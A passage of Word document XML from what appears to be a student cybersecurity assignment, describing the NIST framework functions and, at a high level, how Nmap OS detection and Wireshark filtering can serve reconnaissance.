    <w:p w14:paraId="16365390" w14:textId="1F115005" w:rsidR="005C092F" w:rsidRPr="006010C3" w:rsidRDefault="00D84353" w:rsidP="005C092F">
      <w:r w:rsidRPr="006010C3">
        <w:t>After that the Protect function comes in. As mentioned in the</w:t>
      </w:r>
      <w:r w:rsidR="005C092F" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> background section cybersecurity gives us insight on “establishing protective measures” which can be achieved if a company follows the Protect function. To help lower the chances of a successful attack the protect</w:t>
      </w:r>
      <w:r w:rsidR="00BB02EF" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C092F" w:rsidRPr="006010C3">
        <w:t>functions recommends multiple ideas including data security training, authentication, identity management, and making sure hardware and software are secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777EE94C" w14:textId="77777777" w:rsidR="005C092F" w:rsidRPr="006010C3" w:rsidRDefault="005C092F" w:rsidP="005C092F"/>
    <w:p w14:paraId="66693C68" w14:textId="10A49BCE" w:rsidR="003833DA" w:rsidRPr="006010C3" w:rsidRDefault="005C092F" w:rsidP="005C092F">
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00427834" w:rsidRPr="006010C3">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">etect </w:t>
      </w:r>
      <w:r w:rsidR="00427834" w:rsidRPr="006010C3">
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="00427834" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">when </w:t>
      </w:r>
      <w:r w:rsidR="00B403BF" w:rsidRPr="006010C3">
        <w:t>potential cyber security attacks are spotted</w:t>
      </w:r>
      <w:r w:rsidR="003833DA" w:rsidRPr="006010C3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004C26B4" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00024A6D" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">As mentioned previously in the introduction it talks about the </w:t>
      </w:r>
      <w:r w:rsidR="004D5D05" w:rsidRPr="006010C3">
        <w:t>cyber-attack</w:t>
      </w:r>
      <w:r w:rsidR="00024A6D" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> cycle which has a stage called </w:t>
      </w:r>
      <w:r w:rsidR="003833DA" w:rsidRPr="006010C3">
        <w:t>the delivery.</w:t>
      </w:r>
      <w:r w:rsidR="00024A6D" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> This stage is when the attacker will </w:t>
      </w:r>
      <w:r w:rsidR="003833DA" w:rsidRPr="006010C3">
        <w:t>carry out their attack and exploit the weaknesses they have found. This</w:t>
      </w:r>
      <w:r w:rsidR="004C26B4" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="003833DA" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> relevant as the Detect stage can </w:t>
      </w:r>
      <w:r w:rsidR="004C26B4" w:rsidRPr="006010C3">
        <w:t>be used to spot the attackers attempted attack on the company’s system.</w:t>
      </w:r>
      <w:r w:rsidR="00E43CB7" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> The</w:t>
      </w:r>
      <w:r w:rsidR="003833DA" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> suspicious activity that has been founded can be analysed to figure out where it is coming from and to help find any potential weaknesses in the computer system or network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A76A68" w14:textId="77777777" w:rsidR="00E43CB7" w:rsidRPr="006010C3" w:rsidRDefault="00E43CB7" w:rsidP="005C092F"/>
    <w:p w14:paraId="7C6195BA" w14:textId="67DFE3E2" w:rsidR="00777044" w:rsidRPr="006010C3" w:rsidRDefault="00E43CB7" w:rsidP="005C092F">
      <w:r w:rsidRPr="006010C3">
        <w:t>The Respond function is when the company needs report any issues, limiting the impact of the attack, and more analysis</w:t>
      </w:r>
      <w:r w:rsidR="0099376E" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00777044" w:rsidRPr="006010C3">
        <w:t>The final function is Recover. The Recover function is the stage where the company has to start making things to go back to normal as</w:t>
      </w:r>
      <w:r w:rsidR="00464F90" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> they can </w:t>
      </w:r>
      <w:r w:rsidR="00BB02EF" w:rsidRPr="006010C3">
        <w:t>lose</w:t>
      </w:r>
      <w:r w:rsidR="00464F90" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> out on money and progress If </w:t>
      </w:r>
      <w:r w:rsidR="00BB02EF" w:rsidRPr="006010C3">
        <w:t>they do not</w:t>
      </w:r>
      <w:r w:rsidR="00464F90" w:rsidRPr="006010C3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB02EF" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> This is also</w:t>
      </w:r>
      <w:r w:rsidR="0099376E" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> the stage where polices and actions can be put in place to help the recovery.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="598603166"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00832908" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00832908" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Nat241 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00832908" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidR="00832908" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="321E8865" w14:textId="77777777" w:rsidR="00832908" w:rsidRPr="006010C3" w:rsidRDefault="00832908" w:rsidP="005C092F"/>
    <w:p w14:paraId="4C0681A5" w14:textId="309CD8F3" w:rsidR="002814F1" w:rsidRPr="006010C3" w:rsidRDefault="002814F1" w:rsidP="00C7109A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc165489679"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>b) As stated in the introduction, Reconnaissance is the first stage in the “cyber kill chain” used by</w:t>
      </w:r>
      <w:r w:rsidR="005839DF" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>cybercriminals to gather pertinent information about their target How can the tools Nmap and</w:t>
      </w:r>
      <w:r w:rsidR="00C11028" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>Wireshark be utilized in the reconnaissance stage of a cyber-attack? Please conduct research on</w:t>
      </w:r>
      <w:r w:rsidR="00401779" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>these tools and provide an example of how each tool contributes to gathering pertinent information</w:t>
      </w:r>
      <w:r w:rsidR="00401779" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>about a target.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="006010C3">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56123289" w14:textId="77777777" w:rsidR="00BD0F57" w:rsidRPr="006010C3" w:rsidRDefault="00BD0F57" w:rsidP="00BD0F57">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="229A8C8F" w14:textId="245F5E80" w:rsidR="00EF6B5E" w:rsidRPr="006010C3" w:rsidRDefault="00C56513" w:rsidP="00BD0F57">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006010C3">
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidR="000B2C45" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> ("Network Mapper</w:t>
      </w:r>
      <w:r w:rsidR="006D5178" w:rsidRPr="006010C3">
        <w:t>”) is</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA216A" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">an open source and free </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>port scanner.</w:t>
      </w:r>
      <w:r w:rsidR="000B2C45" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0045488E" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">Nmap is used during the reconnaissance stage </w:t>
      </w:r>
      <w:r w:rsidR="00781A88" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">as it can be used </w:t>
      </w:r>
      <w:r w:rsidR="00721014" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">to carry out a scan </w:t>
      </w:r>
      <w:r w:rsidR="00781A88" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">to get information about </w:t>
      </w:r>
      <w:r w:rsidR="005A38A8" w:rsidRPr="006010C3">
        <w:t>what ports and applications are running on a computer or network</w:t>
      </w:r>
      <w:r w:rsidR="00521A8F" w:rsidRPr="006010C3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00964D8D" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D20E0D" w:rsidRPr="006010C3">
        <w:t>Nmap can carry out multiple different kinds of scans</w:t>
      </w:r>
      <w:r w:rsidR="00EF56B8" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> including an OS detection scan</w:t>
      </w:r>
      <w:r w:rsidR="00D20E0D" w:rsidRPr="006010C3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EF56B8" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00855FA8" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A450D35" w14:textId="344C72C7" w:rsidR="002C23D7" w:rsidRPr="006010C3" w:rsidRDefault="00921435" w:rsidP="00BD0F57">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1918134430"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="002C23D7" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="002C23D7" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION ecc22 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="002C23D7" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[2]</w:t>
          </w:r>
          <w:r w:rsidR="002C23D7" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="0FEDFCA4" w14:textId="0DB9AA98" w:rsidR="00AE4630" w:rsidRPr="006010C3" w:rsidRDefault="00855FA8" w:rsidP="00BD0F57">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006010C3">
        <w:lastRenderedPageBreak/>
        <w:t>An OS detection scan</w:t>
      </w:r>
      <w:r w:rsidR="00884B7B" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> can find out which operating system is being used by the targeted network or computer.</w:t>
      </w:r>
      <w:r w:rsidR="00C6665F" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> To do this the scan will cause </w:t>
      </w:r>
      <w:r w:rsidR="00BB027D" w:rsidRPr="006010C3">
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00C6665F" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> packets that</w:t>
      </w:r>
      <w:r w:rsidR="00CC1A9F" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> have </w:t>
      </w:r>
      <w:r w:rsidR="00EF6B5E" w:rsidRPr="006010C3">
        <w:t>certain</w:t>
      </w:r>
      <w:r w:rsidR="00CC1A9F" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> traits </w:t>
      </w:r>
      <w:r w:rsidR="00BB027D" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">to be sent to </w:t>
      </w:r>
      <w:r w:rsidR="00EF6B5E" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00C900BF" w:rsidRPr="006010C3">
        <w:t>targeted system. Based on the</w:t>
      </w:r>
      <w:r w:rsidR="00D7648D" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> targeted</w:t>
      </w:r>
      <w:r w:rsidR="00C900BF" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF3057" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">systems responses to the </w:t>
      </w:r>
      <w:r w:rsidR="004B0116" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">particular </w:t>
      </w:r>
      <w:r w:rsidR="00DF3057" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">packets </w:t>
      </w:r>
      <w:r w:rsidR="00D7648D" w:rsidRPr="006010C3">
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidR="00DF3057" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> can </w:t>
      </w:r>
      <w:r w:rsidR="00D7648D" w:rsidRPr="006010C3">
        <w:t>determine</w:t>
      </w:r>
      <w:r w:rsidR="00DF3057" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C63F1" w:rsidRPr="006010C3">
        <w:t>what operating system is being used</w:t>
      </w:r>
      <w:r w:rsidR="001904F1" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002D389E" w:rsidRPr="006010C3">
        <w:t>Knowing the operating system can help the atta</w:t>
      </w:r>
      <w:r w:rsidR="00865224" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">cker as they can </w:t>
      </w:r>
      <w:r w:rsidR="001904F1" w:rsidRPr="006010C3">
        <w:t>investigate</w:t>
      </w:r>
      <w:r w:rsidR="00865224" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="003413C3" w:rsidRPr="006010C3">
        <w:t>utilise</w:t>
      </w:r>
      <w:r w:rsidR="00865224" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> the weaknesses and flaws of the operating system</w:t>
      </w:r>
      <w:r w:rsidR="003413C3" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> which in turn will help them attack it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECA134A" w14:textId="17947CAF" w:rsidR="006D5178" w:rsidRPr="006010C3" w:rsidRDefault="00921435" w:rsidP="00BD0F57">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1015149231"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="006D5178" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="006D5178" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Ver23 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="006D5178" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[3]</w:t>
          </w:r>
          <w:r w:rsidR="006D5178" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="39479019" w14:textId="77777777" w:rsidR="006D5178" w:rsidRPr="006010C3" w:rsidRDefault="006D5178" w:rsidP="00BD0F57">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D833B1F" w14:textId="5D4694EB" w:rsidR="00AE4630" w:rsidRPr="006010C3" w:rsidRDefault="00AE4630" w:rsidP="3358189A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">Wireshark is an </w:t>
      </w:r>
      <w:r w:rsidR="00185AE5" w:rsidRPr="006010C3">
        <w:t>open-source</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C83AAE" w:rsidRPr="006010C3">
        <w:t>tool that</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> is used to monitor network traffic a</w:t>
      </w:r>
      <w:r w:rsidR="00F37118" w:rsidRPr="006010C3">
        <w:t>long with analysing network packets.</w:t>
      </w:r>
      <w:r w:rsidR="00C83AAE" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> Wireshark can be used during the reconnaissance stage</w:t>
      </w:r>
      <w:r w:rsidR="003E41DD" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="0087603B" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">look at the </w:t>
      </w:r>
      <w:r w:rsidR="00B768DA" w:rsidRPr="006010C3">
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidR="00C957C6" w:rsidRPr="006010C3">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00B768DA" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">s network and capture packets </w:t>
      </w:r>
      <w:r w:rsidR="004323BB" w:rsidRPr="006010C3">
        <w:t>containing</w:t>
      </w:r>
      <w:r w:rsidR="00B768DA" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> useful information that can be used to exploit weaknesses in the targets network. </w:t>
      </w:r>
      <w:r w:rsidR="004323BB" w:rsidRPr="006010C3">
        <w:t>The captured packets could contain information about t</w:t>
      </w:r>
      <w:r w:rsidR="00A30923" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="006A04D4" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">ports, </w:t>
      </w:r>
      <w:r w:rsidR="0FE11C59" w:rsidRPr="006010C3">
        <w:t>hosts,</w:t>
      </w:r>
      <w:r w:rsidR="002B0D85" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="006A04D4" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="002B0D85" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A30923" w:rsidRPr="006010C3">
        <w:t>network</w:t>
      </w:r>
      <w:r w:rsidR="006A04D4" w:rsidRPr="006010C3">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00A30923" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="002B0D85" w:rsidRPr="006010C3">
        <w:t>architecture.</w:t>
      </w:r>
      <w:r w:rsidR="44F33C81" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="62EA944B" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="44F33C81" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">This information can be used to plan out an attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684130B1" w14:textId="3ABDAB02" w:rsidR="002C23D7" w:rsidRPr="006010C3" w:rsidRDefault="00921435" w:rsidP="3358189A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1528642155"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="002C23D7" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="002C23D7" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Sha23 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="002C23D7" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r w:rsidR="002C23D7" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="235216753"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00B60709" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B60709" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Dav231 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B60709" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[5]</w:t>
          </w:r>
          <w:r w:rsidR="00B60709" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="67B5BF94" w14:textId="1C687077" w:rsidR="3358189A" w:rsidRPr="006010C3" w:rsidRDefault="3358189A" w:rsidP="3358189A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D4CBEA" w14:textId="59D2E7C9" w:rsidR="134E03FF" w:rsidRPr="006010C3" w:rsidRDefault="134E03FF" w:rsidP="3358189A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">Wireshark can filter the network traffic to get specific results. For example, Wireshark can filter the traffic so only traffic from one IP address is displayed, this is done with the host command. Cyber criminals might find this command useful if have a device they are targeting and want to focus on only that system’s traffic. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62454FC4" w14:textId="5C933348" w:rsidR="00B60709" w:rsidRPr="006010C3" w:rsidRDefault="00921435" w:rsidP="3358189A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1540044519"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00B60709" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B60709" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Wir20 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B60709" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[6]</w:t>
          </w:r>
          <w:r w:rsidR="00B60709" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="17804B07" w14:textId="70ECD598" w:rsidR="3358189A" w:rsidRPr="006010C3" w:rsidRDefault="3358189A" w:rsidP="3358189A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1789DA5E" w14:textId="1C71475A" w:rsidR="134E03FF" w:rsidRPr="006010C3" w:rsidRDefault="134E03FF" w:rsidP="3358189A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="006010C3">
        <w:t>Wireshark can also help with defending a system during a cyber-attack as Wireshark can be used to look for any unusual or suspicious activity and to figure out where it is coming from.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7461AFAB" w14:textId="586F53A0" w:rsidR="3358189A" w:rsidRPr="006010C3" w:rsidRDefault="00921435" w:rsidP="3358189A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-801996962"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00B60709" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B60709" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Sha23 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B60709" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r w:rsidR="00B60709" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="599FF218" w14:textId="22BF56A8" w:rsidR="3358189A" w:rsidRPr="006010C3" w:rsidRDefault="3358189A" w:rsidP="3358189A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5ECA04" w14:textId="09275AC0" w:rsidR="3358189A" w:rsidRPr="006010C3" w:rsidRDefault="3358189A" w:rsidP="3358189A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2328"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BE118F6" w14:textId="77777777" w:rsidR="002814F1" w:rsidRPr="006010C3" w:rsidRDefault="002814F1" w:rsidP="00C7109A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc165489680"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>c) Cyber – Attacks and Mitigations strategies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="0A51E72F" w14:textId="344402D3" w:rsidR="002814F1" w:rsidRPr="006010C3" w:rsidRDefault="002814F1" w:rsidP="00C7109A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc165489681"/>
      <w:proofErr w:type="spellStart"/>
